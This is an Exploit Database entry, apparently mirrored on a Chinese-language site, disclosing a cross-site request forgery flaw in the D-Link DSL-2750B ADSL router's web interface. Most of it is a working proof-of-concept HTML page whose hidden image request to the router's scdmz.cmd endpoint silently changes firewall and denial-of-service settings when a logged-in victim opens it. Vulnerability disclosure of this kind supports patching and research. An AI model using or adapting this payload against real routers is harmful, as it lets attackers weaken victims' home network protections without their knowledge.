D-Link DSL-2750B ADSL Route’ – Cross-Site Request Forgery

• Exploit Database
• 9 阅读

• 作者： killall-9
  日期： 2014-02-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/31569/

• # Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
  # Date : 10-02-2014
  # Author : killall-9@mail.com
  # Vendor site : http://www.d-link.com
  # Version : DSL-2750B 
  # Tested on : Firmware Version: EU_2.02; Hardware Version: B1
  
  The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.
  
  POC=>
  
  <html lang="en">
  <head>
  <title>Pinata-CSRF-poc for D-Link</title>
  </head>
  <body>
  <img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
  </body>
  </html>
  
  cincin°°°